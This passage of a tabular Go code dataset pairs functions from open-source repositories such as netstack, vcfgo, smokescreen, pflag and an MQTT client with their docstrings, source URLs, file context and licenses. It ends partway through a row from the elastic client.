repository_name (stringlengths 7-107) | function_path (stringlengths 4-190) | function_identifier (stringlengths 1-236) | language (stringclasses 1) | function (stringlengths 9-647k) | docstring (stringlengths 5-488k) | function_url (stringlengths 71-285) | context (stringlengths 0-2.51M) | license (stringclasses 5) |
---|---|---|---|---|---|---|---|---|
google/netstack | tcpip/adapters/gonet/gonet.go | setDeadline | go | func (d *deadlineTimer) setDeadline(cancelCh *chan struct{}, timer **time.Timer, t time.Time) {
if *timer != nil && !(*timer).Stop() {
*cancelCh = make(chan struct{})
}
select {
case <-*cancelCh:
*cancelCh = make(chan struct{})
default:
}
if t.IsZero() {
return
}
timeout := t.Sub(time.Now())
if timeout <= 0 {
close(*cancelCh)
return
}
ch := *cancelCh
*timer = time.AfterFunc(timeout, func() {
close(ch)
})
} | setDeadline contains the shared logic for setting a deadline.
cancelCh and timer must be pointers to deadlineTimer.readCancelCh and
deadlineTimer.readTimer or deadlineTimer.writeCancelCh and
deadlineTimer.writeTimer.
setDeadline must only be called while holding d.mu. | https://github.com/google/netstack/blob/55fcc16cd0eb096d8418f7bc5162483c31a4e82b/tcpip/adapters/gonet/gonet.go#L148-L182 | package gonet
import (
"context"
"errors"
"io"
"net"
"sync"
"time"
"github.com/google/netstack/tcpip"
"github.com/google/netstack/tcpip/buffer"
"github.com/google/netstack/tcpip/stack"
"github.com/google/netstack/tcpip/transport/tcp"
"github.com/google/netstack/tcpip/transport/udp"
"github.com/google/netstack/waiter"
)
var (
errCanceled = errors.New("operation canceled")
errWouldBlock = errors.New("operation would block")
)
type timeoutError struct{}
func (e *timeoutError) Error() string { return "i/o timeout" }
func (e *timeoutError) Timeout() bool { return true }
func (e *timeoutError) Temporary() bool { return true }
type Listener struct {
stack *stack.Stack
ep tcpip.Endpoint
wq *waiter.Queue
cancel chan struct{}
}
func NewListener(s *stack.Stack, addr tcpip.FullAddress, network tcpip.NetworkProtocolNumber) (*Listener, error) {
var wq waiter.Queue
ep, err := s.NewEndpoint(tcp.ProtocolNumber, network, &wq)
if err != nil {
return nil, errors.New(err.String())
}
if err := ep.Bind(addr); err != nil {
ep.Close()
return nil, &net.OpError{
Op: "bind",
Net: "tcp",
Addr: fullToTCPAddr(addr),
Err: errors.New(err.String()),
}
}
if err := ep.Listen(10); err != nil {
ep.Close()
return nil, &net.OpError{
Op: "listen",
Net: "tcp",
Addr: fullToTCPAddr(addr),
Err: errors.New(err.String()),
}
}
return &Listener{
stack: s,
ep: ep,
wq: &wq,
cancel: make(chan struct{}),
}, nil
}
func (l *Listener) Close() error {
l.ep.Close()
return nil
}
func (l *Listener) Shutdown() {
l.ep.Shutdown(tcpip.ShutdownWrite | tcpip.ShutdownRead)
close(l.cancel)
}
func (l *Listener) Addr() net.Addr {
a, err := l.ep.GetLocalAddress()
if err != nil {
return nil
}
return fullToTCPAddr(a)
}
type deadlineTimer struct {
mu sync.Mutex
readTimer *time.Timer
readCancelCh chan struct{}
writeTimer *time.Timer
writeCancelCh chan struct{}
}
func (d *deadlineTimer) init() {
d.readCancelCh = make(chan struct{})
d.writeCancelCh = make(chan struct{})
}
func (d *deadlineTimer) readCancel() <-chan struct{} {
d.mu.Lock()
c := d.readCancelCh
d.mu.Unlock()
return c
}
func (d *deadlineTimer) writeCancel() <-chan struct{} {
d.mu.Lock()
c := d.writeCancelCh
d.mu.Unlock()
return c
} | Apache License 2.0 |
qingstor/qingstor-sdk-go | config/config.go | LoadDefaultConfig | go | func (c *Config) LoadDefaultConfig() (err error) {
logger, _ := zap.NewDevelopment()
c.HTTPSettings = DefaultHTTPClientSettings
err = yaml.Unmarshal([]byte(DefaultConfigFileContent), c)
if err != nil {
logger.Error("load default config", zap.Error(err))
return
}
c.InitHTTPClient()
c.readCredentialFromEnv()
return
} | LoadDefaultConfig loads the default configuration for Config.
It returns an error if the yaml decode failed. | https://github.com/qingstor/qingstor-sdk-go/blob/a7d593926e41963884c2792f5a9b311fbf891058/config/config.go#L184-L197 | package config
import (
"errors"
"io/ioutil"
"net"
"net/http"
"net/url"
"os"
"strconv"
"strings"
"time"
"go.uber.org/zap"
"gopkg.in/yaml.v2"
"github.com/qingstor/qingstor-sdk-go/v4/utils"
)
type Config struct {
AccessKeyID string `yaml:"access_key_id"`
SecretAccessKey string `yaml:"secret_access_key"`
Host string `yaml:"host"`
Port int `yaml:"port"`
Protocol string `yaml:"protocol"`
Endpoint string `yaml:"endpoint"`
AdditionalUserAgent string `yaml:"additional_user_agent"`
DisableURICleaning bool `yaml:"disable_uri_cleaning"`
LogLevel string `yaml:"log_level"`
EnableVirtualHostStyle bool `yaml:"enable_virtual_host_style"`
EnableDualStack bool `yaml:"enable_dual_stack"`
HTTPSettings HTTPClientSettings
Connection *http.Client
}
type HTTPClientSettings struct {
ConnectTimeout time.Duration `yaml:"connect_timeout"`
ReadTimeout time.Duration `yaml:"read_timeout"`
WriteTimeout time.Duration `yaml:"write_timeout" `
TLSHandshakeTimeout time.Duration `yaml:"tls_timeout"`
IdleConnTimeout time.Duration `yaml:"idle_timeout"`
TCPKeepAlive time.Duration `yaml:"tcp_keepalive_time"`
DualStack bool `yaml:"dual_stack"`
MaxIdleConns int `yaml:"max_idle_conns"`
MaxIdleConnsPerHost int `yaml:"max_idle_conns_per_host"`
ExpectContinueTimeout time.Duration `yaml:"expect_continue_timeout"`
}
var DefaultHTTPClientSettings = HTTPClientSettings{
ConnectTimeout: time.Second * 30,
ReadTimeout: time.Second * 30,
WriteTimeout: time.Second * 30,
TLSHandshakeTimeout: time.Second * 10,
IdleConnTimeout: time.Second * 20,
TCPKeepAlive: 0,
DualStack: false,
MaxIdleConns: 100,
MaxIdleConnsPerHost: 10,
ExpectContinueTimeout: time.Second * 2,
}
func New(accessKeyID, secretAccessKey string) (c *Config, err error) {
c, err = NewDefault()
if err != nil {
c = nil
return
}
c.AccessKeyID = accessKeyID
c.SecretAccessKey = secretAccessKey
return
}
func NewDefault() (c *Config, err error) {
c = &Config{}
err = c.LoadDefaultConfig()
if err != nil {
c = nil
return
}
return
}
func (c *Config) Check() (err error) {
if c.AccessKeyID == "" && c.SecretAccessKey != "" {
err = errors.New("access key ID not specified")
return
}
if c.SecretAccessKey == "" && c.AccessKeyID != "" {
err = errors.New("secret access key not specified")
return
}
if c.Endpoint == "" {
if c.Host == "" {
err = errors.New("server host not specified")
return
}
if c.Port <= 0 {
err = errors.New("server port not specified")
return
}
if c.Protocol == "" {
err = errors.New("server protocol not specified")
return
}
}
if c.AdditionalUserAgent != "" {
for _, x := range c.AdditionalUserAgent {
if int(x) < 32 || int(x) > 126 || int(x) == 32 || int(x) == 34 {
err = errors.New("additional User-Agent contains characters that not allowed")
return
}
}
}
ip := net.ParseIP(c.Host)
if c.EnableVirtualHostStyle {
if ip != nil {
err = errors.New("Host is ip, cannot virtual host style")
return
}
}
if !c.EnableDualStack {
if ip != nil && ip.To4() == nil {
err = errors.New("Host is IPv6 address, enable_dual_stack should be true")
return
}
}
return
} | Apache License 2.0 |
brentp/vcfgo | reader.go | Read | go | func (vr *Reader) Read() *Variant {
line, err := vr.buf.ReadBytes('\n')
if err != nil {
if len(line) == 0 && err == io.EOF {
return nil
} else if err != io.EOF {
vr.verr.Add(err, vr.LineNumber)
}
}
vr.LineNumber++
if line[len(line)-1] == '\n' {
line = line[:len(line)-1]
}
fields := makeFields(line)
return vr.Parse(fields)
} | Read returns a pointer to a Variant. Upon reading, the caller is assumed
to check Reader.Err() | https://github.com/brentp/vcfgo/blob/654ed2e5945df15eabbc671fb16556289533f136/reader.go#L174-L191 | package vcfgo
import (
"bufio"
"bytes"
"fmt"
"io"
"log"
"os"
"strconv"
"strings"
"unsafe"
)
const MISSING_VAL = 256
type Reader struct {
buf *bufio.Reader
Header *Header
verr *VCFError
LineNumber int64
lazySamples bool
r io.Reader
}
func NewWithHeader(r io.Reader, h *Header, lazySamples bool) (*Reader, error) {
buf := bufio.NewReaderSize(r, 32768*2)
var verr = NewVCFError()
return &Reader{buf, h, verr, 1, lazySamples, r}, nil
}
func NewReader(r io.Reader, lazySamples bool) (*Reader, error) {
buffered := bufio.NewReaderSize(r, 32768*2)
var verr = NewVCFError()
var LineNumber int64
h := NewHeader()
for {
LineNumber++
line, err := buffered.ReadString('\n')
if err != nil && err != io.EOF {
verr.Add(err, LineNumber)
}
if len(line) > 1 && line[len(line)-1] == '\n' {
line = line[:len(line)-1]
}
if LineNumber == 1 {
v, err := parseHeaderFileVersion(line)
verr.Add(err, LineNumber)
h.FileFormat = v
} else if strings.HasPrefix(line, "##FORMAT") {
format, err := parseHeaderFormat(line)
verr.Add(err, LineNumber)
if format != nil {
h.SampleFormats[format.Id] = format
}
} else if strings.HasPrefix(line, "##INFO") {
info, err := parseHeaderInfo(line)
verr.Add(err, LineNumber)
if info != nil {
h.Infos[info.Id] = info
}
} else if strings.HasPrefix(line, "##FILTER") {
filter, err := parseHeaderFilter(line)
verr.Add(err, LineNumber)
if filter != nil && len(filter) == 2 {
h.Filters[filter[0]] = filter[1]
}
} else if strings.HasPrefix(line, "##contig") {
contig, err := parseHeaderContig(line)
verr.Add(err, LineNumber)
if contig != nil {
if _, ok := contig["ID"]; ok {
h.Contigs = append(h.Contigs, contig)
} else {
verr.Add(fmt.Errorf("bad contig: %v", line), LineNumber)
}
}
} else if strings.HasPrefix(line, "##SAMPLE") {
sample, err := parseHeaderSample(line)
verr.Add(err, LineNumber)
if sample != "" {
h.Samples[sample] = line
} else {
verr.Add(fmt.Errorf("bad sample: %v", line), LineNumber)
}
} else if strings.HasPrefix(line, "##PEDIGREE") {
h.Pedigrees = append(h.Pedigrees, line)
} else if strings.HasPrefix(line, "##") {
kv, err := parseHeaderExtraKV(line)
verr.Add(err, LineNumber)
if kv != nil && len(kv) == 2 {
h.Extras = append(h.Extras, line)
}
} else if strings.HasPrefix(line, "#CHROM") {
var err error
h.SampleNames, err = parseSampleLine(line)
verr.Add(err, LineNumber)
break
} else {
e := fmt.Errorf("unexpected header line: %s", line)
return nil, e
}
}
reader := &Reader{buffered, h, verr, LineNumber, lazySamples, r}
return reader, reader.Error()
}
func makeFields(line []byte) [][]byte {
fields := bytes.SplitN(line, []byte{'\t'}, 9)
s := 0
for i, f := range fields {
if i == 7 {
break
}
s += len(f) + 1
}
if s >= len(line) {
fmt.Fprintf(os.Stderr, "XXXXX: bad VCF line '%s'", line)
return fields
}
e := bytes.IndexByte(line[s:], '\t')
if e == -1 {
e = len(line)
} else {
e += s
}
fields[7] = line[s:e]
return fields
} | MIT License |
skarlso/google-oauth-go-sample | database/mongo.go | SaveUser | go | func (mdb MongoDBConnection) SaveUser(u *structs.User) error {
mdb.session = mdb.GetSession()
defer mdb.session.Close()
if _, err := mdb.LoadUser(u.Email); err == nil {
return fmt.Errorf("user already exists")
}
c := mdb.session.DB("webadventure").C("users")
err := c.Insert(u)
return err
} | SaveUser registers a user so we know that we saw that user already. | https://github.com/skarlso/google-oauth-go-sample/blob/450d9f17e43a592d62889eefed93006d5ef5ca7e/database/mongo.go#L17-L26 | package database
import (
"fmt"
"github.com/Skarlso/google-oauth-go-sample/structs"
"gopkg.in/mgo.v2"
"gopkg.in/mgo.v2/bson"
)
type MongoDBConnection struct {
session *mgo.Session
} | MIT License |
stripe/smokescreen | pkg/smokescreen/conntrack/instrumented_conn.go | Idle | go | func (ic *InstrumentedConn) Idle() bool {
if ic.tracker.IdleTimeout == 0 {
return false
}
if time.Since(time.Unix(0, *ic.LastActivity)) > ic.tracker.IdleTimeout {
return true
}
return false
} | Idle returns true when the connection's last activity occurred before the
configured idle threshold.
Idle should be called with the connection's lock held. | https://github.com/stripe/smokescreen/blob/dc403015f563eadc556a61870c6ad327688abe88/pkg/smokescreen/conntrack/instrumented_conn.go#L159-L168 | package conntrack
import (
"encoding/json"
"fmt"
"net"
"sync"
"sync/atomic"
"time"
"github.com/sirupsen/logrus"
)
const CanonicalProxyConnClose = "CANONICAL-PROXY-CN-CLOSE"
type InstrumentedConn struct {
net.Conn
Role string
OutboundHost string
proxyType string
ConnError error
tracker *Tracker
logger *logrus.Entry
Start time.Time
LastActivity *int64
timeout time.Duration
BytesIn *uint64
BytesOut *uint64
sync.Mutex
closed bool
CloseError error
}
func (t *Tracker) NewInstrumentedConnWithTimeout(conn net.Conn, timeout time.Duration, logger *logrus.Entry, role, outboundHost, proxyType string) *InstrumentedConn {
ic := t.NewInstrumentedConn(conn, logger, role, outboundHost, proxyType)
ic.timeout = timeout
return ic
}
func (t *Tracker) NewInstrumentedConn(conn net.Conn, logger *logrus.Entry, role, outboundHost, proxyType string) *InstrumentedConn {
now := time.Now()
nowUnixNano := now.UnixNano()
bytesIn := uint64(0)
bytesOut := uint64(0)
ic := &InstrumentedConn{
Conn: conn,
Role: role,
OutboundHost: outboundHost,
tracker: t,
logger: logger,
Start: now,
LastActivity: &nowUnixNano,
BytesIn: &bytesIn,
BytesOut: &bytesOut,
}
ic.tracker.Store(ic, nil)
ic.tracker.Wg.Add(1)
return ic
}
func (ic *InstrumentedConn) Error(err error) {
ic.ConnError = err
}
func (ic *InstrumentedConn) Close() error {
ic.Lock()
defer ic.Unlock()
if ic.closed {
return ic.CloseError
}
ic.closed = true
ic.tracker.Delete(ic)
end := time.Now()
duration := end.Sub(ic.Start).Seconds()
tags := []string{
fmt.Sprintf("role:%s", ic.Role),
}
ic.tracker.statsc.Incr("cn.close", tags, 1)
ic.tracker.statsc.Histogram("cn.duration", duration, tags, 1)
ic.tracker.statsc.Histogram("cn.bytes_in", float64(atomic.LoadUint64(ic.BytesIn)), tags, 1)
ic.tracker.statsc.Histogram("cn.bytes_out", float64(atomic.LoadUint64(ic.BytesOut)), tags, 1)
if ic.tracker.ShuttingDown.Load() == true {
if !ic.Idle() {
ic.logger = ic.logger.WithField("active_at_termination", true)
ic.tracker.statsc.Incr("cn.active_at_termination", tags, 1)
}
}
var errorMessage string
if ic.ConnError != nil {
errorMessage = ic.ConnError.Error()
}
ic.logger.WithFields(logrus.Fields{
"bytes_in": ic.BytesIn,
"bytes_out": ic.BytesOut,
"end_time": end.UTC(),
"duration": duration,
"error": errorMessage,
"last_activity": time.Unix(0, atomic.LoadInt64(ic.LastActivity)).UTC(),
}).Info(CanonicalProxyConnClose)
ic.tracker.Wg.Done()
ic.CloseError = ic.Conn.Close()
return ic.CloseError
}
func (ic *InstrumentedConn) Read(b []byte) (int, error) {
now := time.Now()
if ic.timeout != 0 {
if err := ic.Conn.SetDeadline(now.Add(ic.timeout)); err != nil {
return 0, err
}
}
atomic.StoreInt64(ic.LastActivity, now.UnixNano())
n, err := ic.Conn.Read(b)
atomic.AddUint64(ic.BytesIn, uint64(n))
return n, err
}
func (ic *InstrumentedConn) Write(b []byte) (int, error) {
now := time.Now()
if ic.timeout != 0 {
if err := ic.Conn.SetDeadline(now.Add(ic.timeout)); err != nil {
return 0, err
}
}
atomic.StoreInt64(ic.LastActivity, now.UnixNano())
n, err := ic.Conn.Write(b)
atomic.AddUint64(ic.BytesOut, uint64(n))
return n, err
} | MIT License |
viaq/loki-operator | internal/manifests/service_monitor.go | NewQuerierServiceMonitor | go | func NewQuerierServiceMonitor(opts Options) *monitoringv1.ServiceMonitor {
l := ComponentLabels(LabelQuerierComponent, opts.Name)
serviceMonitorName := serviceMonitorName(QuerierName(opts.Name))
serviceName := serviceNameQuerierHTTP(opts.Name)
lokiEndpoint := serviceMonitorEndpoint(lokiHTTPPortName, serviceName, opts.Namespace, opts.Flags.EnableTLSServiceMonitorConfig)
return newServiceMonitor(opts.Namespace, serviceMonitorName, l, lokiEndpoint)
} | NewQuerierServiceMonitor creates a k8s service monitor for the querier component | https://github.com/viaq/loki-operator/blob/0706b537ffd8aa1cfdcf803f6a8066b3aff85f0e/internal/manifests/service_monitor.go#L49-L57 | package manifests
import (
"github.com/ViaQ/logerr/kverrors"
corev1 "k8s.io/api/core/v1"
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
"k8s.io/apimachinery/pkg/labels"
"sigs.k8s.io/controller-runtime/pkg/client"
"github.com/imdario/mergo"
monitoringv1 "github.com/prometheus-operator/prometheus-operator/pkg/apis/monitoring/v1"
)
func BuildServiceMonitors(opts Options) []client.Object {
return []client.Object{
NewDistributorServiceMonitor(opts),
NewIngesterServiceMonitor(opts),
NewQuerierServiceMonitor(opts),
NewCompactorServiceMonitor(opts),
NewQueryFrontendServiceMonitor(opts),
NewGatewayServiceMonitor(opts),
}
}
func NewDistributorServiceMonitor(opts Options) *monitoringv1.ServiceMonitor {
l := ComponentLabels(LabelDistributorComponent, opts.Name)
serviceMonitorName := serviceMonitorName(DistributorName(opts.Name))
serviceName := serviceNameDistributorHTTP(opts.Name)
lokiEndpoint := serviceMonitorEndpoint(lokiHTTPPortName, serviceName, opts.Namespace, opts.Flags.EnableTLSServiceMonitorConfig)
return newServiceMonitor(opts.Namespace, serviceMonitorName, l, lokiEndpoint)
}
func NewIngesterServiceMonitor(opts Options) *monitoringv1.ServiceMonitor {
l := ComponentLabels(LabelIngesterComponent, opts.Name)
serviceMonitorName := serviceMonitorName(IngesterName(opts.Name))
serviceName := serviceNameIngesterHTTP(opts.Name)
lokiEndpoint := serviceMonitorEndpoint(lokiHTTPPortName, serviceName, opts.Namespace, opts.Flags.EnableTLSServiceMonitorConfig)
return newServiceMonitor(opts.Namespace, serviceMonitorName, l, lokiEndpoint)
} | Apache License 2.0 |
mirantis/k8s-appcontroller | pkg/resources/daemonset.go | Create | go | func (d ExistingDaemonSet) Create() error {
return createExistingResource(d)
} | Create looks for an existing DaemonSet and returns an error if there is no such DaemonSet | https://github.com/mirantis/k8s-appcontroller/blob/437b0eb26b0734b222c8d104d9e6ddd8615286f3/pkg/resources/daemonset.go#L128-L130 | package resources
import (
"log"
"github.com/Mirantis/k8s-AppController/pkg/client"
"github.com/Mirantis/k8s-AppController/pkg/interfaces"
"github.com/Mirantis/k8s-AppController/pkg/report"
"k8s.io/client-go/kubernetes/typed/extensions/v1beta1"
"k8s.io/client-go/pkg/api/v1"
extbeta1 "k8s.io/client-go/pkg/apis/extensions/v1beta1"
)
var daemonSetParamFields = []string{
"Spec.Template.Spec.Containers.Name",
"Spec.Template.Spec.Containers.Env",
"Spec.Template.Spec.InitContainers.Name",
"Spec.Template.Spec.InitContainers.Env",
"Spec.Template.ObjectMeta",
}
type DaemonSet struct {
Base
DaemonSet *extbeta1.DaemonSet
Client v1beta1.DaemonSetInterface
}
type daemonSetTemplateFactory struct{}
func (daemonSetTemplateFactory) ShortName(definition client.ResourceDefinition) string {
if definition.DaemonSet == nil {
return ""
}
return definition.DaemonSet.Name
}
func (daemonSetTemplateFactory) Kind() string {
return "daemonset"
}
func (d daemonSetTemplateFactory) New(def client.ResourceDefinition, c client.Interface, gc interfaces.GraphContext) interfaces.Resource {
newDaemonSet := parametrizeResource(def.DaemonSet, gc, daemonSetParamFields).(*extbeta1.DaemonSet)
return report.SimpleReporter{BaseResource: DaemonSet{Base: Base{def.Meta}, DaemonSet: newDaemonSet, Client: c.DaemonSets()}}
}
func (d daemonSetTemplateFactory) NewExisting(name string, c client.Interface, gc interfaces.GraphContext) interfaces.Resource {
return NewExistingDaemonSet(name, c.DaemonSets())
}
func daemonSetKey(name string) string {
return "daemonset/" + name
}
func daemonSetStatus(d v1beta1.DaemonSetInterface, name string) (interfaces.ResourceStatus, error) {
daemonSet, err := d.Get(name)
if err != nil {
return interfaces.ResourceError, err
}
if daemonSet.Status.CurrentNumberScheduled == daemonSet.Status.DesiredNumberScheduled {
return interfaces.ResourceReady, nil
}
return interfaces.ResourceNotReady, nil
}
func (d DaemonSet) Key() string {
return daemonSetKey(d.DaemonSet.Name)
}
func (d DaemonSet) Status(meta map[string]string) (interfaces.ResourceStatus, error) {
return daemonSetStatus(d.Client, d.DaemonSet.Name)
}
func (d DaemonSet) Create() error {
if err := checkExistence(d); err != nil {
log.Println("Creating", d.Key())
d.DaemonSet, err = d.Client.Create(d.DaemonSet)
return err
}
return nil
}
func (d DaemonSet) Delete() error {
return d.Client.Delete(d.DaemonSet.Name, &v1.DeleteOptions{})
}
type ExistingDaemonSet struct {
Base
Name string
Client v1beta1.DaemonSetInterface
}
func (d ExistingDaemonSet) Key() string {
return daemonSetKey(d.Name)
}
func (d ExistingDaemonSet) Status(meta map[string]string) (interfaces.ResourceStatus, error) {
return daemonSetStatus(d.Client, d.Name)
} | Apache License 2.0 |
edgexfoundry/go-mod-messaging | internal/pkg/mqtt/client.go | newMessageHandler | go | func newMessageHandler(
unmarshaler MessageUnmarshaller,
messageChannel chan<- types.MessageEnvelope,
errorChannel chan<- error) pahoMqtt.MessageHandler {
return func(client pahoMqtt.Client, message pahoMqtt.Message) {
var messageEnvelope types.MessageEnvelope
payload := message.Payload()
err := unmarshaler(payload, &messageEnvelope)
if err != nil {
errorChannel <- err
}
messageEnvelope.ReceivedTopic = message.Topic()
messageChannel <- messageEnvelope
}
} | newMessageHandler creates a function which meets the criteria for a MessageHandler and propagates the received
messages to the proper channel. | https://github.com/edgexfoundry/go-mod-messaging/blob/04d7eb485bae71c4e10a91123812cc18471b7962/internal/pkg/mqtt/client.go#L223-L240 | package mqtt
import (
"crypto/tls"
"encoding/json"
"fmt"
"time"
"github.com/edgexfoundry/go-mod-messaging/v2/internal/pkg"
"github.com/edgexfoundry/go-mod-messaging/v2/pkg/types"
pahoMqtt "github.com/eclipse/paho.mqtt.golang"
)
type ClientCreator func(config types.MessageBusConfig, handler pahoMqtt.OnConnectHandler) (pahoMqtt.Client, error)
type MessageMarshaller func(v interface{}) ([]byte, error)
type MessageUnmarshaller func(data []byte, v interface{}) error
type Client struct {
creator ClientCreator
configuration types.MessageBusConfig
mqttClient pahoMqtt.Client
marshaller MessageMarshaller
unmarshaller MessageUnmarshaller
activeSubscriptions []activeSubscription
}
type activeSubscription struct {
topic string
qos byte
handler pahoMqtt.MessageHandler
errors chan error
}
func NewMQTTClient(config types.MessageBusConfig) (*Client, error) {
client := &Client{
creator: DefaultClientCreator(),
configuration: config,
marshaller: json.Marshal,
unmarshaller: json.Unmarshal,
}
return client, nil
}
func NewMQTTClientWithCreator(
config types.MessageBusConfig,
marshaller MessageMarshaller,
unmarshaller MessageUnmarshaller,
creator ClientCreator) (*Client, error) {
client := &Client{
creator: creator,
configuration: config,
marshaller: marshaller,
unmarshaller: unmarshaller,
}
return client, nil
}
func (mc *Client) Connect() error {
if mc.mqttClient == nil {
mqttClient, err := mc.creator(mc.configuration, mc.onConnectHandler)
if err != nil {
return err
}
mc.mqttClient = mqttClient
}
if mc.mqttClient.IsConnected() {
return nil
}
optionsReader := mc.mqttClient.OptionsReader()
return getTokenError(
mc.mqttClient.Connect(),
optionsReader.ConnectTimeout(),
ConnectOperation,
"Unable to connect")
}
func (mc *Client) onConnectHandler(_ pahoMqtt.Client) {
optionsReader := mc.mqttClient.OptionsReader()
for _, subscription := range mc.activeSubscriptions {
token := mc.mqttClient.Subscribe(subscription.topic, subscription.qos, subscription.handler)
message := fmt.Sprintf("Failed to re-create subscription for topic=%s", subscription.topic)
err := getTokenError(token, optionsReader.ConnectTimeout(), SubscribeOperation, message)
if err != nil {
subscription.errors <- err
}
}
}
func (mc *Client) Publish(message types.MessageEnvelope, topic string) error {
marshaledMessage, err := mc.marshaller(message)
if err != nil {
return NewOperationErr(PublishOperation, err.Error())
}
optionsReader := mc.mqttClient.OptionsReader()
return getTokenError(
mc.mqttClient.Publish(
topic,
optionsReader.WillQos(),
optionsReader.WillRetained(),
marshaledMessage),
optionsReader.ConnectTimeout(),
PublishOperation,
"Unable to publish message")
}
func (mc *Client) Subscribe(topics []types.TopicChannel, messageErrors chan error) error {
optionsReader := mc.mqttClient.OptionsReader()
for _, topic := range topics {
handler := newMessageHandler(mc.unmarshaller, topic.Messages, messageErrors)
qos := optionsReader.WillQos()
token := mc.mqttClient.Subscribe(topic.Topic, qos, handler)
err := getTokenError(token, optionsReader.ConnectTimeout(), SubscribeOperation, "Failed to create subscription")
if err != nil {
return err
}
mc.activeSubscriptions = append(mc.activeSubscriptions, activeSubscription{
topic: topic.Topic,
qos: qos,
handler: handler,
errors: messageErrors,
})
}
return nil
}
func (mc *Client) Disconnect() error {
optionsReader := mc.mqttClient.OptionsReader()
mc.mqttClient.Disconnect(uint(optionsReader.ConnectTimeout() * time.Millisecond))
return nil
}
func DefaultClientCreator() ClientCreator {
return func(config types.MessageBusConfig, handler pahoMqtt.OnConnectHandler) (pahoMqtt.Client, error) {
clientConfiguration, err := CreateMQTTClientConfiguration(config)
if err != nil {
return nil, err
}
clientOptions, err := createClientOptions(clientConfiguration, tls.X509KeyPair, tls.LoadX509KeyPair)
if err != nil {
return nil, err
}
clientOptions.OnConnect = handler
return pahoMqtt.NewClient(clientOptions), nil
}
}
func ClientCreatorWithCertLoader(certCreator pkg.X509KeyPairCreator, certLoader pkg.X509KeyLoader) ClientCreator {
return func(options types.MessageBusConfig, handler pahoMqtt.OnConnectHandler) (pahoMqtt.Client, error) {
clientConfiguration, err := CreateMQTTClientConfiguration(options)
if err != nil {
return nil, err
}
clientOptions, err := createClientOptions(clientConfiguration, certCreator, certLoader)
if err != nil {
return nil, err
}
clientOptions.OnConnect = handler
return pahoMqtt.NewClient(clientOptions), nil
}
} | Apache License 2.0 |
palantir/amalgomate | vendor/github.com/spf13/pflag/float32_slice.go | Float32SliceP | go | func (f *FlagSet) Float32SliceP(name, shorthand string, value []float32, usage string) *[]float32 {
p := []float32{}
f.Float32SliceVarP(&p, name, shorthand, value, usage)
return &p
} | Float32SliceP is like Float32Slice, but accepts a shorthand letter that can be used after a single dash. | https://github.com/palantir/amalgomate/blob/93940ef386d2ff55837e12e26e360d6e1d938f50/vendor/github.com/spf13/pflag/float32_slice.go#L159-L163 | package pflag
import (
"fmt"
"strconv"
"strings"
)
type float32SliceValue struct {
value *[]float32
changed bool
}
func newFloat32SliceValue(val []float32, p *[]float32) *float32SliceValue {
isv := new(float32SliceValue)
isv.value = p
*isv.value = val
return isv
}
func (s *float32SliceValue) Set(val string) error {
ss := strings.Split(val, ",")
out := make([]float32, len(ss))
for i, d := range ss {
var err error
var temp64 float64
temp64, err = strconv.ParseFloat(d, 32)
if err != nil {
return err
}
out[i] = float32(temp64)
}
if !s.changed {
*s.value = out
} else {
*s.value = append(*s.value, out...)
}
s.changed = true
return nil
}
func (s *float32SliceValue) Type() string {
return "float32Slice"
}
func (s *float32SliceValue) String() string {
out := make([]string, len(*s.value))
for i, d := range *s.value {
out[i] = fmt.Sprintf("%f", d)
}
return "[" + strings.Join(out, ",") + "]"
}
func (s *float32SliceValue) fromString(val string) (float32, error) {
t64, err := strconv.ParseFloat(val, 32)
if err != nil {
return 0, err
}
return float32(t64), nil
}
func (s *float32SliceValue) toString(val float32) string {
return fmt.Sprintf("%f", val)
}
func (s *float32SliceValue) Append(val string) error {
i, err := s.fromString(val)
if err != nil {
return err
}
*s.value = append(*s.value, i)
return nil
}
func (s *float32SliceValue) Replace(val []string) error {
out := make([]float32, len(val))
for i, d := range val {
var err error
out[i], err = s.fromString(d)
if err != nil {
return err
}
}
*s.value = out
return nil
}
func (s *float32SliceValue) GetSlice() []string {
out := make([]string, len(*s.value))
for i, d := range *s.value {
out[i] = s.toString(d)
}
return out
}
func float32SliceConv(val string) (interface{}, error) {
val = strings.Trim(val, "[]")
if len(val) == 0 {
return []float32{}, nil
}
ss := strings.Split(val, ",")
out := make([]float32, len(ss))
for i, d := range ss {
var err error
var temp64 float64
temp64, err = strconv.ParseFloat(d, 32)
if err != nil {
return nil, err
}
out[i] = float32(temp64)
}
return out, nil
}
func (f *FlagSet) GetFloat32Slice(name string) ([]float32, error) {
val, err := f.getFlagType(name, "float32Slice", float32SliceConv)
if err != nil {
return []float32{}, err
}
return val.([]float32), nil
}
func (f *FlagSet) Float32SliceVar(p *[]float32, name string, value []float32, usage string) {
f.VarP(newFloat32SliceValue(value, p), name, "", usage)
}
func (f *FlagSet) Float32SliceVarP(p *[]float32, name, shorthand string, value []float32, usage string) {
f.VarP(newFloat32SliceValue(value, p), name, shorthand, usage)
}
func Float32SliceVar(p *[]float32, name string, value []float32, usage string) {
CommandLine.VarP(newFloat32SliceValue(value, p), name, "", usage)
}
func Float32SliceVarP(p *[]float32, name, shorthand string, value []float32, usage string) {
CommandLine.VarP(newFloat32SliceValue(value, p), name, shorthand, usage)
}
func (f *FlagSet) Float32Slice(name string, value []float32, usage string) *[]float32 {
p := []float32{}
f.Float32SliceVarP(&p, name, "", value, usage)
return &p
} | Apache License 2.0 |
grimmer0125/search-github-starred | vendor/github.com/grimmer0125/elastic/indices_get_warmer.go | buildURL | go | func (s *IndicesGetWarmerService) buildURL() (string, url.Values, error) {
var err error
var path string
if len(s.index) == 0 && len(s.typ) == 0 && len(s.name) == 0 {
path = "/_warmer"
} else if len(s.index) == 0 && len(s.typ) == 0 && len(s.name) > 0 {
path, err = uritemplates.Expand("/_warmer/{name}", map[string]string{
"name": strings.Join(s.name, ","),
})
} else if len(s.index) == 0 && len(s.typ) > 0 && len(s.name) == 0 {
path, err = uritemplates.Expand("/_all/{type}/_warmer", map[string]string{
"type": strings.Join(s.typ, ","),
})
} else if len(s.index) == 0 && len(s.typ) > 0 && len(s.name) > 0 {
path, err = uritemplates.Expand("/_all/{type}/_warmer/{name}", map[string]string{
"type": strings.Join(s.typ, ","),
"name": strings.Join(s.name, ","),
})
} else if len(s.index) > 0 && len(s.typ) == 0 && len(s.name) == 0 {
path, err = uritemplates.Expand("/{index}/_warmer", map[string]string{
"index": strings.Join(s.index, ","),
})
} else if len(s.index) > 0 && len(s.typ) == 0 && len(s.name) > 0 {
path, err = uritemplates.Expand("/{index}/_warmer/{name}", map[string]string{
